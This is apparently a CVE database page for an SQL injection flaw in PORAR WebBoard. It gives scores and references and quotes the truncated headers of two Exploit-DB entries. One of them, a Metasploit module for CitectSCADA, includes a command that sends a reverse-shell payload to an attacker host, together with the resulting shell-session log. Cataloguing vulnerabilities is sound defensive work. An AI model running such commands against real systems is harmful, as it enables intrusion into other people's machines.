CVE-2008-1039
published 2008-02-27CVE-2008-1039: SQL injection vulnerability in question.asp in PORAR WEBBOARD allows remote attackers to execute arbitrary SQL commands via the QID parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.6th percentile
SQL injection vulnerability in question.asp in PORAR WEBBOARD allows remote attackers to execute arbitrary SQL commands via the QID parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2008-09-05·CVSS 7.6
CVE-2008-2639 [HIGH] CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
---
##
# $Id: citect_scada_odbc.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
#
# msfcli exploit/windows/misc/citect_scada_odbc RHOST=192.168.2.45 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=192.168.2.101 TARGET=2 E
# [*] Started reverse handler
# ...
# [*] Sending stage (474 bytes)
# [*] Command shell session 1 opened (192.168.2.101:4444 -> 192.168.2.45:1039)
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Citect\CitectSCADA\Bin>
#
# Arbi
Exploit-DB
PORAR WebBoard - 'question.asp' SQL Injection
exploitdb·2008-02-25
CVE-2008-1039 PORAR WebBoard - 'question.asp' SQL Injection
PORAR WebBoard - 'question.asp' SQL Injection
---
## ##
## ##
## ##
###CoRPITX
###
## ##
## ##
## ##
########################### Turkey ####################################
# #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#
# PORAR WEBBOARD SQL Injection Vulnerability
#
#######################################################################
#
# AUTHOR : xcorpitx
#
# HOME : www.Hayalet-hack.com / www.zone-turk.net
#
# email : [email protected]
#
########################################################################
# This (SQL) give Admin name and Admin password
# Bu sorgu direk admin ismi ve sisresini verecektir
#######################################################################
No writeups or analysis indexed.
http://secunia.com/advisories/29102http://www.securityfocus.com/bid/27989https://exchange.xforce.ibmcloud.com/vulnerabilities/40839https://www.exploit-db.com/exploits/5185http://secunia.com/advisories/29102http://www.securityfocus.com/bid/27989https://exchange.xforce.ibmcloud.com/vulnerabilities/40839https://www.exploit-db.com/exploits/5185
2008-02-27
Published